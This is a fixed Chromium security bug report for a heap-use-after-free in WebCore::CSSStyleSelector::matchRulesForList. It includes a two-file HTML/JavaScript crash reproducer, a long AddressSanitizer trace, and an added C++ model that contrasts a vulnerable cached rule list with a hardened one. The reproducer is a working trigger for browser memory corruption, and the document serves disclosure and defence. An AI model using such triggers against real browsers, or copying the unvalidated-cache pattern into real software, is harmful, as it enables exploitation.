Project: chromium
Status: Fixed
Owner: ----
Closed: Jan 2012
OS: All
Pri: 1
Type: Bug-Security
Heap-use-after-free in WebCore::CSSStyleSelector::matchRulesForList
Reported by ax3...@gmail.com, Jan 10 2012
VULNERABILITY DETAILS
A use-after-free can be triggered when accessing an element's CSS after deleting a rule.

VERSION
Crash on 18.0.1000.0 (Developer Build 116831 Linux) and 16.0.912.75 m, Windows7 x64 
Does not crash on 16.0.912.63, Ubuntu 10.10 x64.

REPRODUCTION CASE
--- top-level page ---
<html>
    <head>
        <script>
        function body_start() {
            // CSSOM of the document loaded inside the <object>
            q = document.getElementById('root').contentDocument;
            // Replace the outer document; the <object> element is removed with it,
            // but q still references the child document
            document.open();
            // Drop the second rule ("#test {}"); its CSSStyleRule is freed here
            // (see the "freed by" stack: CSSStyleSheet::deleteRule)
            q.styleSheets[0].deleteRule(1);
            // Cloning <head> clones <title>; HTMLTitleElement::childrenChanged()
            // resolves style and matchRulesForList() reads the freed rule
            q.getElementById('head').cloneNode(true);
        }
        </script>
    </head>
    <body>
        <object data="a.html" id="root" onload="body_start()"></object>
    </body>
</html>

--- a.html ---
<html>
    <head id='head'>
        <title id='test'>poc</title>
        <style>
        html {}
        #test {}
        </style>
    </head>
</html>

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
==19176== ERROR: AddressSanitizer heap-use-after-free on address 0x7fe97cc63f90 at pc 0x7fe9b325cd07 bp 0x7fff8e4772a0 sp 0x7fff8e477298
READ of size 8 at 0x7fe97cc63f90 thread T0
    #0 0x7fe9b325cd07 in WTF::RefPtr<WebCore::CSSMutableStyleDeclaration>::get() const /usr/local/google/asan/asan-llvm-trunk/llvm/projects/compiler-rt/lib/asan/asan_linux.cc:0
    #1 0x7fe9b36b3815 in WebCore::CSSStyleSelector::matchRulesForList(WTF::Vector<WebCore::RuleData, 0ul> const*, int&, int&, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:756
    #2 0x7fe9b36b2fd5 in WebCore::CSSStyleSelector::matchRules(WebCore::RuleSet*, int&, int&, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:654
    #3 0x7fe9b36b505c in WebCore::CSSStyleSelector::matchAllRules(WebCore::CSSStyleSelector::MatchResult&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:854
    #4 0x7fe9b36b11f1 in WebCore::CSSStyleSelector::styleForElement(WebCore::Element*, WebCore::RenderStyle*, bool, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSelector.cpp:1307
    #5 0x7fe9b30d2f22 in WebCore::Element::styleForRenderer() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:1025
    #6 0x7fe9b321c4ac in WebCore::HTMLTitleElement::textWithDirection() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/HTMLTitleElement.cpp:84
    #7 0x7fe9b321c362 in WebCore::HTMLTitleElement::childrenChanged(bool, WebCore::Node*, WebCore::Node*, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/HTMLTitleElement.cpp:61
    #8 0x7fe9b3065924 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, int&, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/ContainerNode.cpp:667
    #9 0x7fe9b3069ce5 in ~PassRefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:67
    #10 0x7fe9b30cd81f in WebCore::Element::cloneElementWithChildren() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:157
    #11 0x7fe9b30cd701 in WebCore::Element::cloneNode(bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:151
    #12 0x7fe9b3069cce in WebCore::ContainerNode::cloneChildNodes(WebCore::ContainerNode*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/ContainerNode.cpp:865
    #13 0x7fe9b30cd81f in WebCore::Element::cloneElementWithChildren() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:157
    #14 0x7fe9b30cd701 in WebCore::Element::cloneNode(bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Element.cpp:151
    #15 0x7fe9b42ac98d in WebCore::NodeInternal::cloneNodeCallback(v8::Arguments const&) /media/Chromium/chromium/depot_tools/src/out/Release/obj/gen/webcore/bindings/V8Node.cpp:217
    #16 0x7fe9b2213053 in HandleApiCallHelper /media/Chromium/chromium/depot_tools/src/v8/src/builtins.cc:1220
    #17 0x7fe98020420e in  
    #18 0x7fe980229473 in  
    #19 0x7fe9802417bb in  
    #20 0x7fe9802292d5 in  
    #21 0x7fe98021fa67 in  
    #22 0x7fe9802072b7 in  
    #23 0x7fe9b225cdbb in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) /media/Chromium/chromium/depot_tools/src/v8/src/execution.cc:118
    #24 0x7fe9b21c7117 in v8::internal::Isolate::handle_scope_implementer() /media/Chromium/chromium/depot_tools/src/v8/src/isolate.h:838
    #25 0x7fe9b35ac9cf in WebCore::V8Proxy::instrumentedCallFunction(WebCore::Page*, v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:428
    #26 0x7fe9b35ac6ac in WebCore::V8Proxy::callFunction(v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:403
    #27 0x7fe9b359c1d3 in WebCore::V8LazyEventListener::callListenerFunction(WebCore::ScriptExecutionContext*, v8::Handle<v8::Value>, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8LazyEventListener.cpp:69
    #28 0x7fe9b3ac24fd in WebCore::V8AbstractEventListener::invokeEventHandler(WebCore::ScriptExecutionContext*, WebCore::Event*, v8::Handle<v8::Value>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:152
    #29 0x7fe9b3ac20d8 in WebCore::V8AbstractEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:98
    #30 0x7fe9b30e510d in WebCore::EventTarget::fireEventListeners(WebCore::Event*, WebCore::EventTargetData*, WTF::Vector<WebCore::RegisteredEventListener, 1ul>&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:214
    #31 0x7fe9b30e4dd7 in WebCore::EventTarget::fireEventListeners(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:199
    #32 0x7fe9b310709e in WebCore::Node::handleLocalEvents(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2730
    #33 0x7fe9b318b64e in WebCore::EventDispatcher::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:319
    #34 0x7fe9b3189a1d in WebCore::EventDispatchMediator::dispatchEvent(WebCore::EventDispatcher*) const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatchMediator.cpp:51
    #35 0x7fe9b318a491 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node*, WTF::PassRefPtr<WebCore::EventDispatchMediator>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:55
    #36 0x7fe9b3107371 in WebCore::Node::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2744
    #37 0x7fe9b395508c in ~PassRefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:67
    #38 0x7fe9b30815de in WebCore::Document::dispatchWindowLoadEvent() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:3649
    #39 0x7fe9b307c4e7 in WebCore::Document::implicitClose() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:2226
    #40 0x7fe9b38bcf5a in WebCore::FrameLoader::checkCompleted() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:740
    #41 0x7fe9b38bb144 in WebCore::FrameLoader::finishedParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:676
    #42 0x7fe9b308ea62 in WebCore::Document::finishedParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:4396
    #43 0x7fe9b3292217 in WebCore::HTMLDocumentParser::prepareToStopParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLDocumentParser.cpp:153
    #44 0x7fe9b38a7cac in WebCore::DocumentWriter::endIfNotLoadingMainResource() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/DocumentWriter.cpp:234
    #45 0x7fe9b38c8c6a in WTF::RefPtr<WebCore::DocumentLoader>::operator->() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:66
    #46 0x7fe9b38e0180 in WebCore::MainResourceLoader::didFinishLoading(double) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/MainResourceLoader.cpp:485
    #47 0x7fe9b486c68d in webkit_glue::WebURLLoaderImpl::Context::OnCompletedRequest(net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&) /media/Chromium/chromium/depot_tools/src/webkit/glue/weburlloader_impl.cc:647
    #48 0x7fe9b2b89c62 in ResourceDispatcher::OnRequestComplete(int, net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&) /media/Chromium/chromium/depot_tools/src/content/common/resource_dispatcher.cc:489
    #49 0x7fe9b2b8af36 in bool ResourceMsg_RequestComplete::Dispatch<ResourceDispatcher, ResourceDispatcher, void (ResourceDispatcher::*)(int, net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&)>(IPC::Message const*, ResourceDispatcher*, ResourceDispatcher*, void (ResourceDispatcher::*)(int, net::URLRequestStatus const&, std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, base::TimeTicks const&)) /media/Chromium/chromium/depot_tools/src/./content/common/resource_messages.h:168
    #50 0x7fe9b2b877a6 in ResourceDispatcher::DispatchMessage(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/content/common/resource_dispatcher.cc:559
    #51 0x7fe9b2b86954 in ResourceDispatcher::OnMessageReceived(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/content/common/resource_dispatcher.cc:326
    #52 0x7fe9b2a9919a in ChildThread::OnMessageReceived(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/content/common/child_thread.cc:172
    #53 0x7fe9b2bdc0ae in IPC::ChannelProxy::Context::OnDispatchMessage(IPC::Message const&) /media/Chromium/chromium/depot_tools/src/ipc/ipc_channel_proxy.cc:263
    #54 0x7fe9b2be1418 in base::internal::InvokeHelper<false, void, base::internal::RunnableAdapter<void (IPC::ChannelProxy::Context::*)(IPC::Message const&)>, void ()(IPC::ChannelProxy::Context* const&, IPC::Message const&)>::MakeItSo(base::internal::RunnableAdapter<void (IPC::ChannelProxy::Context::*)(IPC::Message const&)>, IPC::ChannelProxy::Context* const&, IPC::Message const&) /media/Chromium/chromium/depot_tools/src/./base/bind_internal.h:897
    #55 0x7fe9b175b6b3 in MessageLoop::RunTask(base::PendingTask const&) /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:459
    #56 0x7fe9b175bd04 in MessageLoop::DeferOrRunPendingTask(base::PendingTask const&) /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:470
    #57 0x7fe9b175c0be in MessageLoop::DoWork() /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:660
    #58 0x7fe9b17689de in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /media/Chromium/chromium/depot_tools/src/base/message_pump_default.cc:28
    #59 0x7fe9b175adc4 in MessageLoop::RunInternal() /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:418
    #60 0x7fe9b1759a88 in MessageLoop::Run() /media/Chromium/chromium/depot_tools/src/base/message_loop.cc:301
    #61 0x7fe9b524ed38 in RendererMain(content::MainFunctionParams const&) /media/Chromium/chromium/depot_tools/src/content/renderer/renderer_main.cc:241
    #62 0x7fe9b16c9734 in (anonymous namespace)::RunZygote(content::MainFunctionParams const&, content::ContentMainDelegate*) /media/Chromium/chromium/depot_tools/src/content/app/content_main.cc:233
    #63 0x7fe9b16c92cb in (anonymous namespace)::RunNamedProcessTypeMain(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, content::MainFunctionParams const&, content::ContentMainDelegate*) /media/Chromium/chromium/depot_tools/src/content/app/content_main.cc:271
0x7fe97cc63f90 is located 16 bytes inside of 32-byte region [0x7fe97cc63f80,0x7fe97cc63fa0)
freed by thread T0 here:
    #0 0x7fe9b5bf69b4 in free ??:0
    #1 0x7fe9b369b8d6 in WTF::Vector<WTF::RefPtr<WebCore::CSSRule>, 0ul>::remove(unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/Vector.h:1099
    #2 0x7fe9b36f48e4 in WebCore::CSSStyleSheet::deleteRule(unsigned int, int&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSheet.cpp:177
    #3 0x7fe9b41be627 in WebCore::CSSStyleSheetInternal::deleteRuleCallback(v8::Arguments const&) /media/Chromium/chromium/depot_tools/src/out/Release/obj/gen/webcore/bindings/V8CSSStyleSheet.cpp:113
    #4 0x7fe9b2213053 in HandleApiCallHelper /media/Chromium/chromium/depot_tools/src/v8/src/builtins.cc:1220
    #5 0x7fe98020420e in  
    #6 0x7fe98022942a in  
    #7 0x7fe9802417bb in  
    #8 0x7fe9802292d5 in  
    #9 0x7fe98021fa67 in  
    #10 0x7fe9802072b7 in  
    #11 0x7fe9b225cdbb in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) /media/Chromium/chromium/depot_tools/src/v8/src/execution.cc:118
    #12 0x7fe9b21c7117 in v8::internal::Isolate::handle_scope_implementer() /media/Chromium/chromium/depot_tools/src/v8/src/isolate.h:838
    #13 0x7fe9b35ac9cf in WebCore::V8Proxy::instrumentedCallFunction(WebCore::Page*, v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:428
    #14 0x7fe9b35ac6ac in WebCore::V8Proxy::callFunction(v8::Handle<v8::Function>, v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8Proxy.cpp:403
    #15 0x7fe9b359c1d3 in WebCore::V8LazyEventListener::callListenerFunction(WebCore::ScriptExecutionContext*, v8::Handle<v8::Value>, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8LazyEventListener.cpp:69
    #16 0x7fe9b3ac24fd in WebCore::V8AbstractEventListener::invokeEventHandler(WebCore::ScriptExecutionContext*, WebCore::Event*, v8::Handle<v8::Value>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:152
    #17 0x7fe9b3ac20d8 in WebCore::V8AbstractEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/bindings/v8/V8AbstractEventListener.cpp:98
    #18 0x7fe9b30e510d in WebCore::EventTarget::fireEventListeners(WebCore::Event*, WebCore::EventTargetData*, WTF::Vector<WebCore::RegisteredEventListener, 1ul>&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:214
    #19 0x7fe9b30e4dd7 in WebCore::EventTarget::fireEventListeners(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventTarget.cpp:199
    #20 0x7fe9b310709e in WebCore::Node::handleLocalEvents(WebCore::Event*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2730
    #21 0x7fe9b318b64e in WebCore::EventDispatcher::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:319
    #22 0x7fe9b3189a1d in WebCore::EventDispatchMediator::dispatchEvent(WebCore::EventDispatcher*) const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatchMediator.cpp:51
    #23 0x7fe9b318a491 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node*, WTF::PassRefPtr<WebCore::EventDispatchMediator>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/EventDispatcher.cpp:55
    #24 0x7fe9b3107371 in WebCore::Node::dispatchEvent(WTF::PassRefPtr<WebCore::Event>) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Node.cpp:2744
    #25 0x7fe9b395508c in ~PassRefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:67
    #26 0x7fe9b30815de in WebCore::Document::dispatchWindowLoadEvent() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:3649
    #27 0x7fe9b307c4e7 in WebCore::Document::implicitClose() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/Document.cpp:2226
    #28 0x7fe9b38bcf5a in WebCore::FrameLoader::checkCompleted() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:740
    #29 0x7fe9b38bb144 in WebCore::FrameLoader::finishedParsing() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/FrameLoader.cpp:676
previously allocated by thread T0 here:
    #0 0x7fe9b5bf6a94 in malloc ??:0
    #1 0x7fe9b2d30cfb in WTF::fastMalloc(unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/FastMalloc.cpp:268
    #2 0x7fe9b3670c4e in WebCore::CSSStyleRule::create(WebCore::CSSStyleSheet*, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleRule.h:39
    #3 0x7fe9b36704a5 in WebCore::CSSParser::createStyleRule(WTF::Vector<WTF::OwnPtr<WebCore::CSSParserSelector>, 0ul>*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSParser.cpp:7634
    #4 0x7fe9b4328933 in cssyyparse(void*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSGrammar.y:847
    #5 0x7fe9b3633bc7 in WebCore::CSSParser::parseSheet(WebCore::CSSStyleSheet*, WTF::String const&, int, WTF::HashMap<WebCore::CSSStyleRule*, WTF::RefPtr<WebCore::CSSRuleSourceData>, WTF::PtrHash<WebCore::CSSStyleRule*>, WTF::HashTraits<WebCore::CSSStyleRule*>, WTF::HashTraits<WTF::RefPtr<WebCore::CSSRuleSourceData> > >*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSParser.cpp:282
    #6 0x7fe9b36f4d98 in WebCore::CSSStyleSheet::parseStringAtLine(WTF::String const&, bool, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/css/CSSStyleSheet.cpp:217
    #7 0x7fe9b58d5451 in WTF::RefPtr<WebCore::CSSStyleSheet>::operator->() const /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:66
    #8 0x7fe9b58d4cd1 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #9 0x7fe9b58d4f31 in WebCore::StyleElement::finishParsingChildren(WebCore::Element*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/StyleElement.cpp:110
    #10 0x7fe9b58f3b05 in WebCore::HTMLStyleElement::finishParsingChildren() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/HTMLStyleElement.cpp:66
    #11 0x7fe9b330cfc7 in WebCore::HTMLElementStack::popCommon() /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLElementStack.cpp:596
    #12 0x7fe9b32b6214 in WebCore::HTMLTreeBuilder::processEndTag(WebCore::AtomicHTMLToken&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLTreeBuilder.cpp:2164
    #13 0x7fe9b32b3e28 in WebCore::HTMLTreeBuilder::constructTreeFromAtomicToken(WebCore::AtomicHTMLToken&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLTreeBuilder.cpp:474
    #14 0x7fe9b32b3d38 in WebCore::HTMLTreeBuilder::constructTreeFromToken(WebCore::HTMLToken&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLTreeBuilder.cpp:461
    #15 0x7fe9b3292659 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLDocumentParser.cpp:263
    #16 0x7fe9b3293895 in WebCore::HTMLDocumentParser::append(WebCore::SegmentedString const&) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/html/parser/HTMLDocumentParser.cpp:372
    #17 0x7fe9b58d0d3e in WebCore::DecodedDataDocumentParser::appendBytes(WebCore::DocumentWriter*, char const*, unsigned long) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/dom/DecodedDataDocumentParser.cpp:50
    #18 0x7fe9b3897ae1 in ~RefPtr /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/RefPtr.h:58
    #19 0x7fe9b2cbe06b in WebKit::FrameLoaderClientImpl::committedLoad(WebCore::DocumentLoader*, char const*, int) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebKit/chromium/src/FrameLoaderClientImpl.cpp:1118
    #20 0x7fe9b38979e0 in void WTF::derefIfNotNull<WebCore::DocumentLoader>(WebCore::DocumentLoader*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:52
    #21 0x7fe9b38f4aa2 in WebCore::ResourceLoader::didReceiveData(char const*, int, long long, bool) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/WebCore/loader/ResourceLoader.cpp:291
    #22 0x7fe9b38e001d in void WTF::derefIfNotNull<WebCore::MainResourceLoader>(WebCore::MainResourceLoader*) /media/Chromium/chromium/depot_tools/src/third_party/WebKit/Source/JavaScriptCore/wtf/PassRefPtr.h:52
==19176== ABORTING
Stats: 31M malloced (24M for red zones) by 61911 calls
Stats: 1M realloced by 1161 calls
Stats: 27M freed by 47654 calls
Stats: 0M really freed by 0 calls
Stats: 80M (20493 full pages) mmaped in 20 calls
  mmaps   by size class: 8:65532; 9:8191; 10:4095; 11:2047; 12:1024; 13:1024; 14:256; 15:256; 16:64; 17:64; 18:16; 19:8; 21:4;
  mallocs by size class: 8:48844; 9:6771; 10:3288; 11:1241; 12:351; 13:990; 14:135; 15:224; 16:18; 17:40; 18:1; 19:4; 21:4;
  frees   by size class: 8:36629; 9:5623; 10:2962; 11:881; 12:240; 13:949; 14:109; 15:217; 16:11; 17:24; 18:1; 19:4; 21:4;
  rfrees  by size class:
Stats: malloc large: 49 small slow: 334
Shadow byte and word:
  0x1ffd2f98c7f2: fd
  0x1ffd2f98c7f0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1ffd2f98c7d0: fd fd fd fd fd fd fd fd
  0x1ffd2f98c7d8: fd fd fd fd fd fd fd fd
  0x1ffd2f98c7e0: fa fa fa fa fa fa fa fa
  0x1ffd2f98c7e8: fa fa fa fa fa fa fa fa
=>0x1ffd2f98c7f0: fd fd fd fd fd fd fd fd
  0x1ffd2f98c7f8: fd fd fd fd fd fd fd fd
  0x1ffd2f98c800: fa fa fa fa fa fa fa fa
  0x1ffd2f98c808: fa fa fa fa fa fa fa fa
  0x1ffd2f98c810: fd fd fd fd fd fd fd fd
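The two stack traces above give the shape of the bug: the freed object is a CSSStyleRule dropped from the stylesheet's rule vector by deleteRule, and the reader is the style selector's rule list, which still carries a pointer to that rule and follows it to its declaration. The C++ model below is added here and is not WebKit code or code from the report; it reproduces that shape in miniature and places the vulnerable selector beside one that invalidates its cached rule list whenever the sheet is mutated. The class names, the generation counter and the liveness registry standing in for AddressSanitizer are illustrative assumptions, not WebKit APIs, and nothing in it describes what the upstream changeset actually changed.

```cpp
// Added illustration, not WebKit code: a stylesheet owns its rules through
// shared_ptr (standing in for Vector<RefPtr<CSSRule>>), a style selector
// caches raw pointers to them (standing in for RuleData), and deleting a
// rule without telling the selector leaves dangling entries in the cache.
// All names and the generation counter are illustrative assumptions.
#include <cstddef>
#include <memory>
#include <set>
#include <string>
#include <utility>
#include <vector>

// Liveness registry standing in for AddressSanitizer: rules register on
// construction and unregister on destruction, so a cached pointer can be
// checked instead of dereferenced. (A real allocator could hand the freed
// address to a new rule and fool this check; ASan quarantines to avoid that.)
static std::set<const void*>& liveRules() {
    static std::set<const void*> s;
    return s;
}

struct StyleRule {
    std::string selector;     // e.g. "#test"
    std::string declaration;  // e.g. "color: red"
    StyleRule(std::string sel, std::string decl)
        : selector(std::move(sel)), declaration(std::move(decl)) { liveRules().insert(this); }
    ~StyleRule() { liveRules().erase(this); }
};

// CSSStyleSheet-like owner of the rules.
struct StyleSheet {
    std::vector<std::shared_ptr<StyleRule>> rules;
    unsigned generation = 0;  // bumped on every mutation
    void deleteRule(std::size_t index) {
        rules.erase(rules.begin() + index);  // last reference dropped: rule freed
        ++generation;
    }
};

struct RuleData { StyleRule* rule; };  // non-owning, like WebCore::RuleData

struct MatchStats { std::size_t matched = 0; std::size_t dangling = 0; };

// Shared matching loop: a dangling entry is what ASan reports as heap-use-after-free.
static MatchStats walk(const std::vector<RuleData>& ruleSet, const std::string& selector) {
    MatchStats st;
    for (const RuleData& rd : ruleSet) {
        if (!liveRules().count(rd.rule)) { ++st.dangling; continue; }
        if (rd.rule->selector == selector) ++st.matched;
    }
    return st;
}

// Vulnerable selector: builds its rule set once and never learns the sheet changed.
class VulnerableSelector {
    std::vector<RuleData> ruleSet;
public:
    explicit VulnerableSelector(const StyleSheet& sheet) {
        for (const auto& r : sheet.rules) ruleSet.push_back({r.get()});
    }
    MatchStats matchRulesForList(const std::string& selector) const { return walk(ruleSet, selector); }
};

// Hardened selector: records the sheet generation it was built from and
// rebuilds before matching when the sheet has been mutated since.
class HardenedSelector {
    const StyleSheet& sheet;
    unsigned builtAt = 0;
    std::vector<RuleData> ruleSet;
    void rebuild() {
        ruleSet.clear();
        for (const auto& r : sheet.rules) ruleSet.push_back({r.get()});
        builtAt = sheet.generation;
    }
public:
    explicit HardenedSelector(const StyleSheet& s) : sheet(s) { rebuild(); }
    MatchStats matchRulesForList(const std::string& selector) {
        if (builtAt != sheet.generation) rebuild();
        return walk(ruleSet, selector);
    }
};

// The two rules from a.html in the report: "html {}" then "#test {}".
static StyleSheet makeReportSheet() {
    StyleSheet sheet;
    sheet.rules.push_back(std::make_shared<StyleRule>("html", ""));
    sheet.rules.push_back(std::make_shared<StyleRule>("#test", ""));
    return sheet;
}

// Replays the report's order of events: build the selector, deleteRule(1), then match.
MatchStats vulnerableScenario(const std::string& selector) {
    StyleSheet sheet = makeReportSheet();
    VulnerableSelector sel(sheet);
    sheet.deleteRule(1);
    return sel.matchRulesForList(selector);
}

MatchStats hardenedScenario(const std::string& selector) {
    StyleSheet sheet = makeReportSheet();
    HardenedSelector sel(sheet);
    sheet.deleteRule(1);
    return sel.matchRulesForList(selector);
}
```

In the vulnerable replay the cached list still has two entries after deleteRule(1), and the walk hits one freed rule; the real code has no registry to consult, so that hit is an 8-byte read from freed memory, which is exactly the `READ of size 8` ASan prints above. The hardened replay notices the generation change and rebuilds, so the walk only ever sees live rules. Whether a cache is invalidated on mutation or rebuilt lazily is a design choice; the invariant is that a non-owning pointer must never outlive the owner's reference.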
Comment 1 by cdn@chromium.org, Jan 10 2012
